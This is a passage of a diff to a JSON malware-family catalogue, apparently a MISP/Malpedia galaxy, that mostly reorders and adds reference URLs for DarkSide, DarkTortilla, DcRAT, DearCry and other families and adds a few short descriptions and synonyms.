"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://twitter.com/ValthekOn/status/1422385890467491841?s=20", - "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#", - "https://brandefense.io/darkside-ransomware-analysis-report/", - "https://twitter.com/sysopfb/status/1422280887274639375", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", - "https://community.riskiq.com/article/fdf74f23", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", - "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/", - "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/", - "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", - "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside", - "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", - "https://us-cert.cisa.gov/ncas/alerts/aa21-131a", "https://www.glimps.fr/lockbit3-0/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", - "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", - "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", - "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/", - "https://www.databreaches.net/a-chat-with-darkside/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter", - "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/", - "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware", + "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://zawadidone.nl/darkside-ransomware-analysis/", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", + "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", + "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/", + "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", - "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", - "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", - "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a", + "https://www.databreaches.net/a-chat-with-darkside/", + "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", + "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", + "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/", + "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/", + "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", + "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html", + "https://twitter.com/sysopfb/status/1422280887274639375", + "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/", + "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://community.riskiq.com/article/fdf74f23", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/", - "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", + "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside", + "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/", + "https://twitter.com/ValthekOn/status/1422385890467491841?s=20", + "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/", + "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/", + "https://www.ic3.gov/Media/News/2021/211101.pdf", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-131a", + "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/", + "https://blog.group-ib.com/blackmatter#", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://blog.group-ib.com/blackmatter2", "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/", - "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", - "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf" + "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf", + "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#", + "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", + "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/" ], "synonyms": [ "BlackMatter" @@ -21002,8 +22001,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "http://telegra.ph/Analiz-botneta-DarkSky-12-30" + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://blog.radware.com/security/2018/02/darksky-botnet/" ], "synonyms": [], "type": [] @@ -21038,7 +22037,7 @@ "value": "DarkTequila" }, { - "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", + "description": "DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks\u00ae Counter Threat Unit\u2122 (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver \"addon packages\" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.\r\n\r\nFrom January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla", @@ -21055,11 +22054,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", - "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", - "https://www.tgsoft.it/files/report/download.asp?id=7481257469", "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html", - "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "https://www.facebook.com/darktrackrat/", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml" ], "synonyms": [], @@ -21069,13 +22068,13 @@ "value": "Darktrack RAT" }, { - "description": "", + "description": "According to Enigmasoft, DarkVNC malware is a hacking tool that is available for purchase online. it is can be used as a Virtual Network Computing service, which means that the attackers can get full access to the targeted system via this malware. However, unlike a genuine Virtual Network Computing utility, the DarkVNC threat operates in the background silently. Therefore, it is highly likely that the victims may not notice that their systems have been compromised.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc", "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884", - "https://reaqta.com/2017/11/short-journey-darkvnc/", - "https://isc.sans.edu/diary/rss/28934" + "https://isc.sans.edu/diary/rss/28934", + "https://reaqta.com/2017/11/short-journey-darkvnc/" ], "synonyms": [], "type": [] @@ -21088,10 +22087,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", "https://www.secureworks.com/research/threat-profiles/bronze-butler", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ "Muirim", @@ -21122,15 +22121,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", "https://www.macnica.net/mpressioncss/feature_05.html/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/" ], "synonyms": [], "type": [] @@ -21143,17 +22142,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin", - "https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis", "https://www.nzz.ch/technologie/china-soll-mit-praezedenzloser-malware-regierungen-ausspioniert-haben-ld.1672292", - "https://twitter.com/M_haggis/status/1498399791276912640", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage-analysis", + "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage", + "https://twitter.com/M_haggis/status/1498399791276912640", "https://www.reuters.com/technology/new-chinese-hacking-tool-found-spurring-us-warning-allies-2022-02-28/", "https://teamt5.org/tw/posts/backdoor-of-driver-analysis-Daxin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-malware-espionage-analysis", - "https://gist.github.com/usualsuspect/839fbc54e0d76bb2626329cd94274cd6" + "https://www.bleepingcomputer.com/news/security/chinese-cyberspies-target-govts-with-their-most-advanced-backdoor/" + ], + "synonyms": [ + "DELIMEAT" ], - "synonyms": [], "type": [] }, "uuid": "63bf3200-5e7b-4e29-ba1c-6bf834c15459", @@ -21164,12 +22166,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", - "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", - "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", + "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/", "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat", - "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader", + "https://www.zscaler.com/blogs/security-research/dbatloader-actively-distributing-malwares-targeting-european-businesses", + "https://securityintelligence.com/posts/email-campaigns-leverage-updated-dbatloader-deliver-rats-stealers/", + "https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html", "https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/", - "https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/" + "https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands" ], "synonyms": [ "ModiLoader", @@ -21211,30 +22216,32 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat", - "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", "https://forensicitguy.github.io/snip3-crypter-dcrat-vbs/", - "https://cert.gov.ua/article/160530", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://community.riskiq.com/article/50c77491", - "https://www.youtube.com/watch?v=ElqmQDySy48", - "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", + "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", + "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", + "https://cert.gov.ua/article/405538", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://community.riskiq.com/article/50c77491", + "https://embee-research.ghost.io/dcrat-manual-de-obfuscation/", + "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", + "https://cert.gov.ua/article/160530", + "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", "https://www.zscaler.com/blogs/security-research/freecryptoscam-new-cryptocurrency-scam-leads-installation-backdoors-and", "https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html", "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", - "https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://blogs.infoblox.com/cyber-threat-intelligence/cyber-campaign-briefs/malspam-campaign-delivers-dark-crystal-rat-dcrat/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://cert.gov.ua/article/405538", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.youtube.com/watch?v=ElqmQDySy48", + "https://muha2xmad.github.io/malware-analysis/dcrat/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [ "DarkCrystal RAT" @@ -21277,11 +22284,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", - "https://unit42.paloaltonetworks.com/atoms/rancortaurus/" + "https://unit42.paloaltonetworks.com/atoms/rancortaurus/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html" ], "synonyms": [], "type": [] @@ -21296,8 +22303,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood", "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/", - "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/" + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf" ], "synonyms": [ "Agrius", @@ -21314,9 +22321,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply", + "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/", "https://securelist.com/threat-in-your-browser-extensions/107181", - "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/", - "https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/" + "https://www.catonetworks.com/blog/the-dga-algorithm-used-by-dealply-and-bujo/" ], "synonyms": [], "type": [] @@ -21325,19 +22332,19 @@ "value": "DealPly" }, { - "description": "", + "description": "According to PCrisk, DearCry ransomware has been observed infecting systems via ProxyLogon vulnerabilities of Microsoft Exchange servers - mail and calendaring servers developed by Microsoft. While a patch has been released addressing these vulnerabilities, thousands of Microsoft Exchange servers remained unpatched at the time of research.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf", + "https://www.youtube.com/watch?v=qmCjtigVVR0", + "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s", "https://www.youtube.com/watch?v=Hhx9Q2i7zGo", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s", - "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", - "https://www.youtube.com/watch?v=qmCjtigVVR0", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", "https://www.youtube.com/watch?v=MRTdGUy1lfw", - "https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf" + "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/" ], "synonyms": [ "DoejoCrypt" @@ -21353,12 +22360,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom", "https://twitter.com/Amigo_A_/status/1196898012645220354", - "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html", - "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", - "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", - "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md", "https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html", - "https://asec.ahnlab.com/1269" + "https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html", + "https://asec.ahnlab.com/1269", + "https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md", + "https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html", + "https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html" ], "synonyms": [ "deathransom", @@ -21401,8 +22408,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepcreep", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] @@ -21428,19 +22435,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - 